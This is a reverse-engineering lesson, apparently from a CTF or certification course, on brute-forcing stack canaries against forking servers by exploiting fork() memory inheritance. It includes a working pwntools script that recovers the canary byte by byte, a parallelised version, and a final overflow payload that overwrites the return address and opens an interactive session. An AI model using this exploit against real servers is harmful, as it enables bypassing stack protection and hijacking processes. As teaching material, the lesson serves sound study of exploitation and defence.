
Canary Brute-Force on Forking Servers: Byte-by-Byte Enumeration Exploiting fork() Memory Inheritance

reverse_engineering Difficulty 1–5 30 min certifiable

Theory

Why This Matters

Forking servers, such as Apache pre-fork and many CTF challenge servers, call fork() to handle each connection. The child process inherits an exact copy of the parent's memory, including the master canary in TLS at fs:0x28. Because the canary is the same across all forks of the same parent process, it can be brute-forced byte by byte without an explicit information-leak primitive. Servers that fork and then exec a fresh copy of the binary for each connection (an xinetd-launched service, for example) do not qualify, because the canary is regenerated at every exec. The attack requires at most 256 × 8 = 2048 connection attempts to recover all 8 bytes, or 256 × 7 = 1792 when the low byte is known to be null, as it is with glibc on x86-64. NICE K0168 and S0131 require understanding this forking-server property and how to implement an efficient byte-by-byte oracle. This is the standard technique when no format string or other info-leak is available.

Core Concept

fork() creates a child process with a copy of the parent's address space, including:

  • Stack contents (and therefore the canary on the stack at the point of fork)
  • TLS segment at fs:0x28 (the master canary value)
  • Heap, globals, and all other memory

The child's canary is identical to the parent's. When the child crashes (SIGSEGV or __stack_chk_fail), the parent continues and the next fork() call creates another child with the same canary. This gives an attacker an unlimited oracle: send a candidate canary, observe whether the process crashes or continues, repeat.
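The inheritance property can be illustrated without a vulnerable binary. The sketch below is only an analogy: `secret` is a hypothetical stand-in for the master canary, chosen once by the parent, and each forked child reports its copy through a pipe before aborting. It assumes a POSIX system where os.fork() is available.

```python
import os

# Stand-in for the master canary: chosen once, when the "server" starts.
secret = os.urandom(8)

def value_seen_by_child():
    """Fork a child, let it report its copy of `secret`, then let it crash."""
    read_fd, write_fd = os.pipe()
    pid = os.fork()
    if pid == 0:                       # child: works on an inherited copy of memory
        os.close(read_fd)
        os.write(write_fd, secret)
        os.abort()                     # die with SIGABRT, as __stack_chk_fail would
    os.close(write_fd)                 # parent: keeps running after the child dies
    data = os.read(read_fd, 8)
    os.close(read_fd)
    _, status = os.waitpid(pid, 0)
    return data, os.WTERMSIG(status)

# Three "connections": three children, each crashing, parent unaffected.
seen = [value_seen_by_child() for _ in range(3)]
for data, sig in seen:
    print(data.hex(), "child killed by signal", sig)
```

Every child prints the same value, and the parent survives each crash, which is exactly the combination the brute force relies on.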

Byte-by-byte oracle: instead of guessing all 8 bytes at once (256^8 attempts), guess one byte at a time:

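  1. Fix the known prefix (start with \x00 for byte 0: with glibc on x86-64 the canary's lowest byte is always null)
  2. Try all 256 values for byte 1: send an overflow that ends exactly at that byte, i.e. padding + \x00 + candidate_byte and nothing after it. The remaining canary bytes, saved RBP and saved RIP must stay untouched, otherwise even a correct guess crashes the child. This needs an input routine such as read() or recv() that does not append a terminator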
  3. If the process does not crash (or responds normally), the candidate byte is correct
  4. Move to byte 2, keep byte 1 fixed, repeat

Total attempts: byte 0 is known to be \x00 and needs no connection, so the maximum is 256 × 7 = 1792 attempts. With a sequential scan the average is about 128 × 7 ≈ 900 attempts.
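The enumeration and its cost can be checked offline with a simulated oracle. In this sketch `SECRET` and `oracle()` are hypothetical stand-ins for the remote canary and for "the child survived"; no network is involved.

```python
import os

SECRET = b"\x00" + os.urandom(7)      # hypothetical canary, low byte null
attempts = 0

def oracle(prefix: bytes) -> bool:
    """Simulated child: survives only if the overwritten bytes match."""
    global attempts
    attempts += 1
    return SECRET[:len(prefix)] == prefix

def recover() -> bytes:
    known = b"\x00"                    # byte 0 is fixed, no guess needed
    while len(known) < 8:
        for candidate in range(256):
            if oracle(known + bytes([candidate])):
                known += bytes([candidate])
                break
        else:
            raise RuntimeError("no candidate survived")
    return known

recovered = recover()
print(recovered.hex(), "recovered in", attempts, "attempts")
```

The attempt counter never exceeds 256 per unknown byte, compared with 256^8 for guessing the whole value at once.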

Detecting crash vs. success: the oracle response depends on the server's behavior:

  • Connection closed without response: crash (SIGSEGV or __stack_chk_fail)
  • Connection sends expected response: success (candidate byte is correct)
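A minimal sketch of that decision using plain sockets follows. The function name `classify` and the third outcome, "unknown" for a timeout with the connection still open, are assumptions added for illustration; what counts as the "expected response" depends on the target. Socket pairs stand in for real server connections.

```python
import socket

def classify(sock: socket.socket, timeout: float = 1.0) -> str:
    """Return 'success' if the peer answers, 'crash' if it closes or resets."""
    sock.settimeout(timeout)
    try:
        data = sock.recv(4096)
    except socket.timeout:
        return "unknown"               # no answer yet, connection still open
    except ConnectionResetError:
        return "crash"
    return "success" if data else "crash"   # b'' means the peer closed

# Peer that answers: treated as a surviving child.
a, b = socket.socketpair()
b.sendall(b"OK\n")
alive = classify(a)

# Peer that closes without answering: treated as a crashed child.
c, d = socket.socketpair()
d.close()
dead = classify(c)

# Peer that stays silent: ambiguous, retry rather than guess.
e, f = socket.socketpair()
silent = classify(e, timeout=0.1)

for s in (a, b, c, e, f):
    s.close()
print(alive, dead, silent)
```

Treating a timeout as its own case avoids recording a slow child as a wrong guess.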

Technical Deep-Dive

from pwn import *
import sys

HOST = 'localhost'
PORT = 9999

def try_canary(canary_bytes):
    """Overwrite only len(canary_bytes) bytes of the canary; return True if the child survives."""
    r = None
    try:
        r = remote(HOST, PORT, timeout=2)
        r.recvuntil(b'Input: ', timeout=2)

        # buf_size = 64 bytes to reach canary; adjust for your target
        buf_size = 64
        payload  = b'A' * buf_size          # fill buffer up to the canary
        payload += canary_bytes             # known prefix + one candidate byte
        # Nothing follows: the remaining canary bytes, saved RBP and saved RIP
        # must stay intact so that a correct guess lets the function return.
        # send(), not sendline(): a trailing newline would clobber the next byte.
        r.send(payload)

        # If the server echoes back something / sends a menu again: success
        response = r.recv(timeout=1)
        return len(response) > 0
    except Exception:
        # EOFError (child died) or a connection error: treat as a wrong guess
        return False
    finally:
        if r is not None:
            r.close()

def brute_canary():
    canary = b'\x00'    # low byte always 0x00

    for byte_idx in range(1, 8):
        found = False
        for candidate in range(0x00, 0x100):
            # Partial overwrite: no padding after the candidate byte
            probe = canary + bytes([candidate])
            if try_canary(probe):
                canary += bytes([candidate])
                log.info(f'Byte {byte_idx}: {candidate:#04x}  canary so far: {canary.hex()}')
                found = True
                break
        if not found:
            log.error(f'Failed at byte {byte_idx}')
            sys.exit(1)

    return canary

canary = brute_canary()
log.success(f'Full canary: {canary.hex()} = {u64(canary):#018x}')

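# Now use the recovered canary for the real exploit
r = remote(HOST, PORT)
r.recvuntil(b'Input: ')
payload  = b'A' * 64              # same buffer-to-canary offset as above
payload += canary                 # full 8-byte canary, so the check passes
payload += p64(0xdeadbeef)        # saved RBP (placeholder)
payload += p64(0x401234)          # win() address (placeholder; use your target's)
r.send(payload)                   # send(): no trailing newline after the return address
r.interactive()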

Timing optimization: parallelise byte guesses per position — send 256 connections simultaneously (or in batches), observe which one succeeds. This reduces wall-clock time from minutes to seconds:

from concurrent.futures import ThreadPoolExecutor, as_completed

def check_byte(candidate, known_prefix):
    # Partial overwrite: known prefix plus one candidate byte, no padding
    probe = known_prefix + bytes([candidate])
    return candidate, try_canary(probe)

canary = b'\x00'
for byte_idx in range(1, 8):
    found = None
    with ThreadPoolExecutor(max_workers=32) as executor:
        futures = [executor.submit(check_byte, c, canary) for c in range(0x100)]
        for future in as_completed(futures):
            candidate, success = future.result()
            if success:
                found = candidate
                break
        # Drop probes that have not started; running ones finish on exit
        for future in futures:
            future.cancel()
    if found is None:
        log.error(f'Failed at byte {byte_idx}')   # raises PwnlibException
    canary += bytes([found])
    log.info(f'Byte {byte_idx}: {found:#04x}')

Reverse Engineering Methodology

  1. Confirm the server forks: strace -e trace=clone,fork ./server or pstree during connection to see if child processes spawn. A new PID per connection confirms forking.
  2. Confirm the canary is consistent: attach gdb to two different children (or inspect two core dumps) and compare the value at fs:0x28. If the values differ, the server does not simply fork: it re-executes the binary for each connection (fork followed by exec) or re-randomises the canary, and this attack does not apply.
  3. Find the buffer-to-canary offset: locally, run the binary under gdb, send cyclic(200, n=8), break at the canary check, and pass the value being compared against fs:0x28 to cyclic_find(value, n=8). Remotely, grow the payload one byte at a time; the first length that crashes the child is one more than the number of bytes that fill the buffer before the canary position.
  4. Automate with pwntools: use remote() in a loop with appropriate timeout settings. When the child crashes, the kernel closes its socket and pwntools raises EOFError on the next recv(); catch it to detect the "wrong candidate" case.
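The buffer-to-canary offset from step 3 can also be measured without a debugger by growing the payload until the child first crashes. The sketch below assumes a `survives(payload)` callable (hypothetical; in practice a wrapper around a single connection) and uses a simulated target with a made-up layout to stay self-contained. It also assumes nothing else between the buffer and the canary crashes the function when overwritten.

```python
def find_canary_offset(survives, max_len=512):
    """Return the number of filler bytes that fit before the canary.

    `survives(payload)` must return True if the child answered normally.
    """
    for length in range(1, max_len + 1):
        if not survives(b"A" * length):
            return length - 1          # the last byte written hit the canary
    raise RuntimeError("no crash observed up to max_len")

# Simulated target: the canary sits 72 bytes after the start of the buffer.
CANARY_OFFSET = 72
CANARY = b"\x00" + bytes(range(1, 8))

def fake_survives(payload):
    overwritten = payload[CANARY_OFFSET:CANARY_OFFSET + 8]
    return CANARY[:len(overwritten)] == overwritten

offset = find_canary_offset(fake_survives)
print("canary starts", offset, "bytes into the payload")
```

The filler byte must be non-null: the canary's first byte is \x00, so a null filler would overwrite it with the same value and hide the boundary.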

Common Reversing Errors

  • Assuming all servers are forking: thread-based servers do not fork. All threads share the process-wide canary, but a failed canary check aborts the whole process, not just one thread, so the first wrong guess kills the server. If a supervisor restarts it, the new process gets a fresh canary and every byte recovered so far is invalid. The byte-by-byte oracle only works when the parent survives each failed guess.
  • Getting byte 0 wrong: the canary's first byte is always \x00. If the probe starts with a non-null byte 0, every attempt at byte 1 will fail because the canary comparison already fails at byte 0. Always fix byte 0 as \x00.
  • Slow sequential guessing making the challenge time out: many CTF challenges have connection rate limits or total time limits. Use parallelism (as shown above) to complete the brute force within a minute rather than an hour.
  • Mistaking a canary check failure for the overflow itself: __stack_chk_fail calls abort(), which sends SIGABRT. The process exits with signal 6, not SIGSEGV (signal 11). Both result in connection closure, but if you have shell access, checking $? or dmesg distinguishes them.
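The two signals can be told apart from a parent process by inspecting the child's exit status. This is a minimal sketch that uses throwaway Python child processes in place of the vulnerable server; the helper name `exit_signal` is hypothetical, and a POSIX system is assumed.

```python
import signal
import subprocess
import sys

def exit_signal(code: str) -> int:
    """Run `code` in a fresh interpreter; return the signal that killed it (0 if none)."""
    proc = subprocess.run([sys.executable, "-c", code],
                          stderr=subprocess.DEVNULL)
    # On POSIX, a negative returncode -N means "terminated by signal N".
    return -proc.returncode if proc.returncode < 0 else 0

# abort() is what __stack_chk_fail ends in; SIGSEGV is what a bad return address causes.
abort_sig = exit_signal("import os; os.abort()")
segv_sig = exit_signal("import os, signal; os.kill(os.getpid(), signal.SIGSEGV)")

print(signal.Signals(abort_sig).name, signal.Signals(segv_sig).name)
```

During local testing, a SIGSEGV on a probe that should only touch the canary suggests the payload is longer than intended and is reaching saved RBP or RIP.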
